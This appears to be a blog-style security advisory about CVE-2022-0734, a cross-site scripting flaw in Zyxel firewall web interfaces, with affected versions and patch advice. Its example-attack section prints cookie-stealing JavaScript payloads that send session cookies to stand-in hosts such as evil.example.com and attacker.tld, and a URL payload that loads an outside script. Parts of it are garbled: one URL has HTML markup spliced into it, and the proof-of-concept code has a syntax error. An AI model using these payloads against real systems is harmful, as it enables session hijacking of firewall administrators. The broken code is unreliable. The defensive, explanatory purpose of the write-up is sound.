CVE-2022-0734 - How a Cross-Site Scripting (XSS) Bug Put Zyxel Firewalls at Risk

In 2022, a dangerous vulnerability, CVE-2022-0734, was found in the CGI (Common Gateway Interface) web program of several Zyxel firewall products, including ZyWALL, USG FLEX, ATP, and VPN series. This bug is a classic cross-site scripting (XSS) flaw—if you’re an admin using any Zyxel hardware in this list, this is a must-read.

Why It Matters

XSS could let an attacker inject malicious JavaScript into the web interface of your Zyxel device. In plain English: A hacker could steal your session cookies, snatch your tokens, or even impersonate you—potentially getting full access to your firewall’s admin.

Affected Versions

- USG/ZyWALL Series: 4.35 through 4.70

VPN Series: 4.35 through 5.20

If you’re on a version within these ranges, you’re at risk.

How XSS in Zyxel Web UI Works

The bug is in the CGI program. Normally, web forms should escape or sanitize any user data before displaying it back on a page. But in these versions, Zyxel’s CGI didn’t do a perfect job. That meant an attacker could sneak a script into a form field—say, a login page or system log search field.

Example Attack

Let’s say an admin visits a page where the username field is reflected back (like in an error message). An attacker submits:

<script>alert('Pwned!');</script>

The vulnerable Zyxel CGI page echoes this input *without* cleaning it. The result? The script runs in the victim’s browser.

Simplified Vulnerable Code Snippet

# Python-like pseudocode representing the vulnerable CGI behavior
user_input = request.GET['search']
print(f"Search Results for: {user_input}")

If user_input is <script>steal()</script>, that script launches.

In real-life attacks, instead of popping an alert, a hacker might steal cookies (session tokens), like so:

<script>fetch('https://evil.example.com?c='+document.cookie)</script>

- Attacker creates a URL to the vulnerable admin panel, injecting XSS in a parameter

`

https://vulnerable-firewall/admin.cgi?search=fetch('<a href="https://evil.site?c='+document.cookie" rel="nofollow">https://evil.site?c='+document.cookie</a>)

Cookies are sent to attacker

- The script runs in the admin’s browser, sending sensitive cookies/session tokens outside.

Here’s a minimal PoC using JavaScript. Replace the vulnerable parameter with your own finding

<script>
fetch('https://attacker.tld/log?cookie='; + document.cookie);
</script>

Or, use a payload in the URL

/admin.cgi?search=<script src="https://attacker.tld/x.js"></script>;

Zyxel’s Response & Fix

Zyxel released patches as soon as this was made public. Their security advisory (links below) has a table matching product code and fixed firmware version. Upgrade immediately if you haven’t yet.

- Zyxel Security Advisory for CVE-2022-0734 (Official)

- NVD entry for CVE-2022-0734

Upgrade firmware as recommended in Zyxel’s advisory.

- Restrict admin interface access (VPN-only / behind firewall).

Don’t click suspicious links, even as a firewall admin.

- Use strong browser protections/add-ons.

Conclusion

XSS in firewall admin panels isn’t just an annoyance—it can be game over for your network. Update your Zyxel devices now, review your logs, and check for strange activity!

If you’re running any of these versions, take this seriously—CVE-2022-0734 is easy to exploit and dangerous in the wrong hands.


References:  
- Official Zyxel Security Advisory  
- NVD - CVE-2022-0734

Timeline

Published on: 05/24/2022 03:15:00 UTC
Last modified on: 06/06/2022 18:16:00 UTC